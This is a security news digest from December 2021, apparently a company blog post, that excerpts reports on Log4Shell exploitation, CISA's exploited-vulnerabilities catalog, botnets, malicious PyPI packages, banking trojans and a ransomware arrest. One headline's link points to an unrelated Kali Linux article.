December 13, 2021

Fortify Security Team
Dec 13, 2021

Title: The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues.

Date Published: December 13, 2021

https://securityaffairs.co/wordpress/125577/security/log4shell-known-exploited-vulnerabilities-catalog.html

Excerpt: “The CVE-2021-44228 flaw made the headlines last week, after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library. The impact of the issue is devastating, thousands of organizations worldwide are potentially exposed to attacks and security experts are already reported exploitation attempts in the wild. CISA also warns of a recently disclosed arbitrary file download vulnerability in FortiOS, tracked as CVE-2021-44168, that is actively exploited.”

Title: Log4j Flaw: Attackers Are Making Thousands of Attempts to Exploit This Severe Vulnerability

Date Published: December 13, 2021

https://www.zdnet.com/article/log4j-flaw-attackers-are-making-thousands-of-attempts-to-exploit-this-severe-vulnerability/

Excerpt: “Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, while there also reports of several botnets, including Mirai, Tsunami, and Kinsing, that are making attempts to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of crypto mining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.”

Title: Two Linux Botnets Already Exploit log4shell Flaw in Log4j

Date Published: December 13, 2021

https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html

Excerpt: “The attackers used a uy top-level domain for the C2 infrastructure, which is uncommon. The Muhstik variant used in the attacks includes a backdoor module, ldm, which adds an SSH backdoor public key to allow remote connections to the server. After the public key is added to the ~/.ssh/authorized_keys file, the attacker can directly log into the remote server without password authentication. Experts pointed out that Muhstik uses the TOR network for its reporting mechanism. “Before accessing the TOR network, Muhstik queries relay.l33t-ppl.inf through some publicly available DoH services. During this process, a number of DNS requests are generated.” reads the post published by NetLab 360.”

Title: Hackers Start Pushing Malware in Worldwide log4shell Attacks

Date Published: December 12, 2021

https://www.bleepingcomputer.com/news/security/kali-linux-20214-released-with-9-new-tools-further-apple-m1-support/

Excerpt: “As soon as the vulnerability was released, we saw threat actors exploiting the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers, as shown below. The threat actors behind the Kinsing backdoor and cryptomining botnet are heavily abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts. This shell script will remove competing malware from the vulnerable device and then download and install the Kinsing malware, which will begin mining for cryptocurrency.”

Title: Arrest in Romania of a Ransomware Affiliate Scavenging for Sensitive Data

Date Published: December 13, 2021

https://www.bleepingcomputer.com/news/security/police-arrests-ransomware-affiliate-behind-high-profile-attacks/

Excerpt: “Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors. The 41-year-old Romanian national was arrested Monday morning at his home in Craiova, Romania, by the DIICOT (the Romanian Directorate for Investigating Organized Crime and Terrorism) and judicial police officers, on suspicions of unauthorized access to a computer system, unauthorized transfer of computer data, illegal interception of a computer transmission, and blackmail.”

Title: Malicious Pypi Packages with over 10,000 Downloads Taken Down

Date Published: December 13, 2021

https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-with-over-10-000-downloads-taken-down/

Excerpt: “The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers’ report. This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.”

Title: TinyNuke Banking Malware Targets French Entities

Date Published: December 13, 2021

https://www.proofpoint.com/us/blog/threat-insight/tinynuke-banking-malware-targets-french-entities

Excerpt: “Proofpoint identified multiple recent campaigns leveraging invoice-themed lures to distribute the uncommonly observed TinyNuke malware. The activity marks a stark reappearance of this threat, which has not been seen with regularity since 2018. The campaigns target hundreds of customers in various industries including manufacturing, technology, construction, and business services. The campaigns use French language lures with invoice or other financial themes, and almost exclusively target French entities and companies with operations in France.”

Title: Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan

Date Published: December 13, 2021

https://thehackernews.com/2021/12/microsoft-details-building-blocks-of.html

Excerpt: “Infection chains associated with the multi-purpose Qakbot malware have been broken down into “distinct building blocks,” an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a “customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it.” Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns.”

Title: US, Australia and Japan Stump up for Subsea Cable between Nauru, Kiribati and Federated States of Micronesia

Date Published: December 12, 2021

https://www.zdnet.com/article/us-australia-and-japan-stump-up-for-subsea-cable-between-nauru-kiribati-and-federated-states-of-micronesia/

Excerpt: “The United States, Australia, and Japan have said they will provide funding for a new subsea cable to connect the Pacific island nations of Nauru, Kiribati, and Federated States of Micronesia (FSM). The new cable will connect the island containing the capital of Kiribati with Nauru and the island of Kosrae in FSM, before connecting with the Hantru-1 cable at the island of Pohnpei in FSM. A joint statement between the six nations said the cable would provide better connectivity to 100,000 people across the three Pacific nations.”

Title: Western Digital Sandisk Secureaccess Flaws Allow Brute Force and Dictionary Attacks

Date Published: December 11, 2021

https://securityaffairs.co/wordpress/125530/security/western-digital-sandisk-secureaccess-flaws.html

Excerpt: “The SanDisk SecureAccess software, now rebranded SanDisk PrivateAccess, allows storing and protecting critical and sensitive files on SanDisk USB flash drives. The access to the user’s private vault is protected by a personal password, and all the files are automatically encrypted. According to the vendor, SanDisk SecureAccess version 3.02 was using a one-way cryptographic hash with a predictable salt, This means that the software is vulnerable to dictionary attacks. The software also uses a password hash with insufficient computational effort, as a consequence, an attacker can brute force user passwords leading to unauthorized access to user data.”

Recent Posts

September 16, 2022

Title: Uber hacked, internal systems breached and vulnerability reports stolen Date Published: September 16, 2022 https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/ Excerpt: “Uber suffered a...

September 15, 2022

Title: Webworm hackers modify old malware in new attacks to evade attribution Date Published: September 15, 2022 https://www.bleepingcomputer.com/news/security/webworm-hackers-modify-old-malware-in-new-attacks-to-evade-attribution/ Excerpt: “The Chinese 'Webworm'...

September 14, 2022

Title: Chinese hackers create Linux version of the SideWalk Windows malware Date Published: September 14, 2022 https://www.bleepingcomputer.com/news/security/chinese-hackers-create-linux-version-of-the-sidewalk-windows-malware/ Excerpt: “State-backed Chinese hackers...

September 13, 2022

Title: Cyberspies drop new infostealer malware on govt networks in Asia Date Published: September 13, 2022 https://www.bleepingcomputer.com/news/security/cyberspies-drop-new-infostealer-malware-on-govt-networks-in-asia/ Excerpt: “Security researchers have identified...

September 12, 2022

Title: Cisco confirms Yanluowang ransomware leaked stolen company data Date Published: September 12, 2022 https://www.bleepingcomputer.com/news/security/cisco-confirms-yanluowang-ransomware-leaked-stolen-company-data/ Excerpt: “Cisco has confirmed that the data leaked...

September 9, 2022

Title: Bumblebee Malware Adds Post-exploitation Tool for Stealthy Infections Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/bumblebee-malware-adds-post-exploitation-tool-for-stealthy-infections/ Excerpt: “A new version of the...

September 8, 2022

Title: North Korean Lazarus Hackers Take Aim at U.S. Energy Providers Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/ Excerpt: “The North Korean APT group 'Lazarus' (APT38)...